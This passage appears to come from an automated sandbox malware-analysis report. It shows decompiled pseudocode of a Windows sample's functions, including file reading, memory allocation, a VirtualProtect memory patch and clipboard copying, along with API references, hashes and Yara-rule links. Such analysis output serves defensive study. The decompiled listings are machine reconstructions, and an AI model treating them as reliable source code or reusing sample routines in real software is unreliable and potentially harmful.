					_t37 = E7375298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E737529AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E737529B6() + _a4 + _v8);
							_push(E737529C0());
							if( *0x73754040 <= 0 || E7375297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7375403c =  *0x7375403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73754048;
					if( *0x73754048 == 0) {
						 *0x7375403c = 0;
					}
					E737529E4(_t107, _a4,  *0x7375401c,  *0x73754020);
					return _a4;
				}
				_push(E737529B6() + _a4);
				_t56 = E737529BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E737529C8();
				_t87 = E737529C4();
				_t90 = E737529C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                                        0x73752a48
                                                                                                        0x73752a59
                                                                                                        0x73752a66
                                                                                                        0x73752a7a
                                                                                                        0x73752a68
                                                                                                        0x73752a6d
                                                                                                        0x73752a72
                                                                                                        0x73752a72
                                                                                                        0x73752a66
                                                                                                        0x73752a83
                                                                                                        0x73752a88
                                                                                                        0x73752a8e
                                                                                                        0x73752ad2
                                                                                                        0x73752ad2
                                                                                                        0x73752ad7
                                                                                                        0x73752adc
                                                                                                        0x73752ae2
                                                                                                        0x73752ae4
                                                                                                        0x73752aea
                                                                                                        0x73752af7
                                                                                                        0x73752af9
                                                                                                        0x73752afe
                                                                                                        0x73752b0b
                                                                                                        0x73752b1e
                                                                                                        0x73752b24
                                                                                                        0x73752b2a
                                                                                                        0x73752b2b
                                                                                                        0x73752b31
                                                                                                        0x73752b3d
                                                                                                        0x73752b43
                                                                                                        0x73752b4b
                                                                                                        0x73752b4c
                                                                                                        0x73752b4f
                                                                                                        0x73752b5a
                                                                                                        0x73752b5c
                                                                                                        0x73752b68
                                                                                                        0x73752b6e
                                                                                                        0x73752b76
                                                                                                        0x73752ba2
                                                                                                        0x73752ba3
                                                                                                        0x73752ba5
                                                                                                        0x73752ba9
                                                                                                        0x73752ba9
                                                                                                        0x73752bb0
                                                                                                        0x73752b86
                                                                                                        0x73752b86
                                                                                                        0x73752b87
                                                                                                        0x73752b95
                                                                                                        0x73752b9e
                                                                                                        0x73752b9e
                                                                                                        0x73752b76
                                                                                                        0x73752b5a
                                                                                                        0x73752bb2
                                                                                                        0x73752bb9
                                                                                                        0x73752bbb
                                                                                                        0x73752bbb
                                                                                                        0x73752bd4
                                                                                                        0x73752be2
                                                                                                        0x73752be2
                                                                                                        0x73752a99
                                                                                                        0x73752a9a
                                                                                                        0x73752a9f
                                                                                                        0x73752aa3
                                                                                                        0x73752aa8
                                                                                                        0x73752abc
                                                                                                        0x73752abd
                                                                                                        0x73752abe
                                                                                                        0x73752ac0
                                                                                                        0x73752ac5
                                                                                                        0x73752ac7
                                                                                                        0x73752ac7
                                                                                                        0x73752aca
                                                                                                        0x73752ad0
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • EnumSystemCodePagesW.KERNELBASE(00000000), ref: 73752AF7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CodeEnumPagesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2369445336-0
                                                                                                        • Opcode ID: b192221b16464ec97e72724cb7333f245d3a84974a12f4ca38da48c7cbca455c
                                                                                                        • Instruction ID: 61194e38dfb2c72b1cee9ef34a59c477d3725d906919faa0908f29d50873d815
                                                                                                        • Opcode Fuzzy Hash: b192221b16464ec97e72724cb7333f245d3a84974a12f4ca38da48c7cbca455c
                                                                                                        • Instruction Fuzzy Hash: 31416C7390431DDFEB2DAFA5DA86B593779EB44324F344469F809E7250DB3898808FA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                        0x004031c3
                                                                                                        0x004031d6
                                                                                                        0x004031de
                                                                                                        0x00000000
                                                                                                        0x004031e5
                                                                                                        0x00000000
                                                                                                        0x004031e7

                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                        • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                                        • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                        • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 73752921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73754038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7375404c, 4, 0x40, 0x7375403c); // executed
					 *0x7375404c = 0xc2;
					 *0x7375403c = 0;
					 *0x73754044 = 0;
					 *0x73754058 = 0;
					 *0x73754048 = 0;
					 *0x73754040 = 0;
					 *0x73754050 = 0;
					 *0x7375404e = 0;
				}
				return 1;
			}



                                                                                                        0x7375292a
                                                                                                        0x7375292f
                                                                                                        0x7375293f
                                                                                                        0x73752947
                                                                                                        0x7375294e
                                                                                                        0x73752953
                                                                                                        0x73752958
                                                                                                        0x7375295d
                                                                                                        0x73752962
                                                                                                        0x73752967
                                                                                                        0x7375296c
                                                                                                        0x7375296c
                                                                                                        0x73752974

                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNELBASE(7375404C,00000004,00000040,7375403C), ref: 7375293F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 295aa0026a27090dd78fea463dfe950be07a41527f62f3cfda86e51957c74f37
                                                                                                        • Instruction ID: fd05530ec4c7a6fae764fdd99100e89db17e7adc5f6b63cc835fdc56ffb2de37
                                                                                                        • Opcode Fuzzy Hash: 295aa0026a27090dd78fea463dfe950be07a41527f62f3cfda86e51957c74f37
                                                                                                        • Instruction Fuzzy Hash: 95F092B39083AEDEC368EF6A85467063EF0A319264F3145AAE59CD7241E33C40448B11
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                        0x004031ff
                                                                                                        0x00403205

                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                        • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                        • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                        • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7375101B, Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 16%
                                                                                                        			E7375101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E737514BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E737514E2();
			}





                                                                                                        0x7375101b
                                                                                                        0x73751022
                                                                                                        0x7375102f
                                                                                                        0x73751035
                                                                                                        0x73751024
                                                                                                        0x73751024
                                                                                                        0x73751024
                                                                                                        0x7375103c

                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,73751019,00000001), ref: 7375102F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 3761449716-0
                                                                                                        • Opcode ID: e68cf1fb1969a679ddb17c923b7af56d9e2ce0cad13dcf07f19316e10b12f957
                                                                                                        • Instruction ID: 5251ed11ce95a2627608bd452ee54b52c73e606c7dc5c29c2567c65e39ac583f
                                                                                                        • Opcode Fuzzy Hash: e68cf1fb1969a679ddb17c923b7af56d9e2ce0cad13dcf07f19316e10b12f957
                                                                                                        • Instruction Fuzzy Hash: 76C08CA300030ABBFE1CA2F68B49F2A22AC8B48253F20D404F64EC70C0DA29C5009231
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 73751215, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E73751215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x7375405c); // executed
				return _t1;
			}




                                                                                                        0x7375121d
                                                                                                        0x73751223

                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,73751233,?,737512CF,-7375404B,737511AB,-000000A0), ref: 7375121D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 3761449716-0
                                                                                                        • Opcode ID: 799230b3ed578165fb5abf324bf360401d1ae19f5b3704d99f6b98558823ff18
                                                                                                        • Instruction ID: 5bea91db95acab8fcf084d33bc01f0f412965d057ee176b6a63cf6b5074a7bce
                                                                                                        • Opcode Fuzzy Hash: 799230b3ed578165fb5abf324bf360401d1ae19f5b3704d99f6b98558823ff18
                                                                                                        • Instruction Fuzzy Hash: F0A0017394521ADAEE49ABE2890AF543A22A748721F308080E35D541A4C66A40109B25
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                        0x0040504b
                                                                                                        0x00405051
                                                                                                        0x0040505a
                                                                                                        0x0040505d
                                                                                                        0x004051f5
                                                                                                        0x00405219
                                                                                                        0x00405219
                                                                                                        0x0040522c
                                                                                                        0x0040524a
                                                                                                        0x00405251
                                                                                                        0x004052a8
                                                                                                        0x004052ac
                                                                                                        0x00000000
                                                                                                        0x004052b3
                                                                                                        0x004052bb
                                                                                                        0x004052c3
                                                                                                        0x004052c6
                                                                                                        0x004053bf
                                                                                                        0x00000000
                                                                                                        0x004053bf
                                                                                                        0x004052d5
                                                                                                        0x004052e1
                                                                                                        0x004052e7
                                                                                                        0x004052ed
                                                                                                        0x00405302
                                                                                                        0x00405308
                                                                                                        0x004052ef
                                                                                                        0x004052f4
                                                                                                        0x004052fa
                                                                                                        0x004052fd
                                                                                                        0x004052fd
                                                                                                        0x00405318
                                                                                                        0x00405320
                                                                                                        0x00405323
                                                                                                        0x0040532c
                                                                                                        0x0040532f
                                                                                                        0x00405336
                                                                                                        0x0040533d
                                                                                                        0x00405345
                                                                                                        0x00405345
                                                                                                        0x0040535c
                                                                                                        0x0040535c
                                                                                                        0x00405363
                                                                                                        0x00405369
                                                                                                        0x00405372
                                                                                                        0x00405379
                                                                                                        0x00405382
                                                                                                        0x00405384
                                                                                                        0x00405387
                                                                                                        0x00405396
                                                                                                        0x00405398
                                                                                                        0x0040539e
                                                                                                        0x0040539f
                                                                                                        0x004053a0
                                                                                                        0x004053a8
                                                                                                        0x004053b3
                                                                                                        0x004053b9
                                                                                                        0x004053b9
                                                                                                        0x00000000
                                                                                                        0x00405323
                                                                                                        0x004052ac
                                                                                                        0x00405259
                                                                                                        0x00405289
                                                                                                        0x00405291
                                                                                                        0x0040529c
                                                                                                        0x0040529c
                                                                                                        0x004052a3
                                                                                                        0x00000000
                                                                                                        0x004052a3
                                                                                                        0x0040525d
                                                                                                        0x00405267
                                                                                                        0x00000000
                                                                                                        0x0040522e
                                                                                                        0x00405234
                                                                                                        0x0040526c
                                                                                                        0x00000000
                                                                                                        0x00405275
                                                                                                        0x0040523d
                                                                                                        0x00405242
                                                                                                        0x00405245
                                                                                                        0x00000000
                                                                                                        0x00405245
                                                                                                        0x0040522c
                                                                                                        0x00405063
                                                                                                        0x00405067
                                                                                                        0x00405070
                                                                                                        0x00405077
                                                                                                        0x0040507a
                                                                                                        0x0040507d
                                                                                                        0x00405080
                                                                                                        0x00405081
                                                                                                        0x00405082
                                                                                                        0x0040509b
                                                                                                        0x0040509e
                                                                                                        0x004050a8
                                                                                                        0x004050b7
                                                                                                        0x004050bf
                                                                                                        0x004050c7
                                                                                                        0x004050cc
                                                                                                        0x004050cf
                                                                                                        0x004050db
                                                                                                        0x004050e4
                                                                                                        0x004050ed
                                                                                                        0x00405110
                                                                                                        0x00405116
                                                                                                        0x00405127
                                                                                                        0x0040512c
                                                                                                        0x0040513a
                                                                                                        0x00405148
                                                                                                        0x00405148
                                                                                                        0x0040514d
                                                                                                        0x0040515b
                                                                                                        0x0040515b
                                                                                                        0x00405160
                                                                                                        0x00405163
                                                                                                        0x00405168
                                                                                                        0x00405174
                                                                                                        0x0040517d
                                                                                                        0x0040518a
                                                                                                        0x00405199
                                                                                                        0x0040518c
                                                                                                        0x00405191
                                                                                                        0x00405191
                                                                                                        0x004051a5
                                                                                                        0x004051a5
                                                                                                        0x004051b9
                                                                                                        0x004051c2
                                                                                                        0x004051cb
                                                                                                        0x004051db
                                                                                                        0x004051e7
                                                                                                        0x004051e7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 004050A1
                                                                                                        • GetDlgItem.USER32 ref: 004050B0
                                                                                                        • GetClientRect.USER32 ref: 004050ED
                                                                                                        • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                        • GetDlgItem.USER32 ref: 004051B2
                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                        • GetDlgItem.USER32 ref: 004050BF
                                                                                                          • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                        • GetDlgItem.USER32 ref: 00405204
                                                                                                        • CreateThread.KERNEL32 ref: 00405212
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                        • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                        • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                        • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                        • AppendMenuA.USER32 ref: 004052E1
                                                                                                        • GetWindowRect.USER32 ref: 004052F4
                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                        • GlobalLock.KERNEL32 ref: 0040537C
                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                                        • SetClipboardData.USER32 ref: 004053B3
                                                                                                        • CloseClipboard.USER32 ref: 004053B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                        • String ID: {
                                                                                                        • API String ID: 590372296-366298937
                                                                                                        • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                        • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                        • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                        • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
